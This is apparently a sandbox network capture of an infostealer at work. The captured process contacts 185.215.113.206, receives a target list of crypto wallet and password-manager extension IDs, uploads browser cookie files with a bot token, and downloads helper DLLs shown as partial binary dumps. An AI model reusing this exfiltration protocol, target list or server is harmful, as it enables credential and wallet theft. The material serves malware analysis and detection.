52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Dec 7, 2024 10:51:14.892568111 CET	124	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1k
Dec 7, 2024 10:51:14.893510103 CET	1236	IN	Data Raw: 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 Data Ascii: cG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2F
Dec 7, 2024 10:51:14.893579960 CET	1236	IN	Data Raw: 55 32 39 73 5a 6d 78 68 63 6d 55 67 56 32 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 Data Ascii: U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWN
Dec 7, 2024 10:51:14.893590927 CET	248	IN	Data Raw: 63 47 56 76 61 32 4a 70 61 32 68 6d 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 46 79 64 47 6c 68 62 69 42 42 63 48 52 76 63 79 42 58 59 57 78 73 5a 58 52 38 5a 57 5a 69 5a 32 78 6e 62 32 5a 76 61 58 42 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d Data Ascii: cGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFR
Dec 7, 2024 10:51:14.894527912 CET	1236	IN	Data Raw: 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 Data Ascii: ciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHB
Dec 7, 2024 10:51:14.894603014 CET	1236	IN	Data Raw: 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 Data Ascii: aGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5
Dec 7, 2024 10:51:14.902853012 CET	248	IN	Data Raw: 62 47 56 30 66 47 39 71 5a 32 64 74 59 32 68 73 5a 32 68 75 61 6d 78 68 63 47 31 6d 59 6d 35 71 61 47 39 73 5a 6d 70 72 61 57 6c 6b 59 6d 4e 6f 66 44 46 38 4d 48 77 77 66 46 42 31 62 48 4e 6c 49 46 64 68 62 47 78 6c 64 43 42 44 61 48 4a 76 62 57 Data Ascii: bGV0fG9qZ2dtY2hsZ2huamxhcG1mYm5qaG9sZmpraWlkYmNofDF8MHwwfFB1bHNlIFdhbGxldCBDaHJvbWl1bXxjaW9qb2Nwa2NsZmZsb21iYmNmaWdjaWpqY2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21
Dec 7, 2024 10:51:15.084408998 CET	544	IN	Data Raw: 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 77 77 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 Data Ascii: ZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5
Dec 7, 2024 10:51:15.085748911 CET	470	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA Host: 185.215.113.206 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="message"fplugins------BAFCGIJDAFBKFIECBGCA--
Dec 7, 2024 10:51:15.531321049 CET	335	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Dec 7, 2024 10:51:15.564750910 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ Host: 185.215.113.206 Content-Length: 6015 Connection: Keep-Alive Cache-Control: no-cache
Dec 7, 2024 10:51:16.521513939 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 10:51:16.791380882 CET	94	OUT	GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 10:51:17.234266043 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:17 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49763	185.215.113.206	80	7484	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:51:26.609050989 CET	621	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJKEHCAKFBFHJKEHCFI Host: 185.215.113.206 Content-Length: 419 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 [TRUNCATED] Data Ascii: ------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------JJJKEHCAKFBFHJKEHCFIContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------JJJKEHCAKFBFHJKEHCFI--
Dec 7, 2024 10:51:28.455404997 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 10:51:28.585100889 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKEHDGDGHCBGCAKFIII Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DBKEHDGDGHCBGCAKFIIIContent-Disposition: form-data; name="file"------DBKEHDGDGHCBGCAKFIII--
Dec 7, 2024 10:51:30.640244007 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49808	185.215.113.206	80	3200	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Dec 7, 2024 10:51:42.553778887 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIE Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 33 36 38 62 32 61 61 62 61 34 63 39 39 63 37 36 63 63 30 64 36 66 30 32 36 37 66 36 31 34 66 30 32 32 32 37 65 37 35 64 31 30 65 31 64 61 61 65 37 39 38 36 32 66 61 30 61 62 38 65 61 35 61 65 32 37 34 61 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 46 49 4a 44 47 48 43 42 46 48 4a 4b 46 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="token"4d368b2aaba4c99c76cc0d6f0267f614f02227e75d10e1daae79862fa0ab8ea5ae274af5------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCAFIJDGHCBFHJKFCGIEContent-Disposition: form-data; name="file"------HCAFIJDGHCBFHJKFCGIE--
Dec 7, 2024 10:51:44.390253067 CET	203	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 7, 2024 10:51:45.739023924 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 7, 2024 10:51:46.181925058 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:45 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 7, 2024 10:51:46.181984901 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Dec 7, 2024 10:51:46.181997061 CET	1236	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Dec 7, 2024 10:51:46.182130098 CET	1236	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Dec 7, 2024 10:51:46.182209015 CET	1236	IN	Data Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2 Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
Dec 7, 2024 10:51:46.182219982 CET	1236	IN	Data Raw: f0 8d 86 00 ff ff ff 3d 00 ff ff ff 77 0a 68 0e e0 ff ff e9 d0 00 00 00 8b 45 08 85 c0 0f 84 c0 00 00 00 8d 9d f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 50 e8 28 f9 07 00 83 c4 0c bf 00 01 00 00 0f 1f 80 00 00 00 00 56 ff 75 0c 53 e8 0f f9 07 00 Data Ascii: =whEhh !P(VuS)9wWuSufDT>\>=t%>>f1h
Dec 7, 2024 10:51:46.182230949 CET	776	IN	Data Raw: 45 d0 0f 84 a4 00 00 00 89 55 e0 89 5d dc 8b 45 ec 04 01 89 4d d4 0f b6 c8 8a 5d e8 8b 55 f0 8a 24 0a 00 e3 0f b6 f3 8b 55 f0 8a 3c 32 8b 55 f0 88 3c 0a 8b 55 f0 88 24 32 00 e7 0f b6 f7 8b 4d 10 8a 21 8b 4d f0 32 24 31 8b 4d d4 8b 55 e4 88 22 ba Data Ascii: EU]EM]U$U<2U<U$2M!M2$1MU")UtDEU$U<2U<U$2MaM2$1MUbu-]En~uMMUEEM]}7
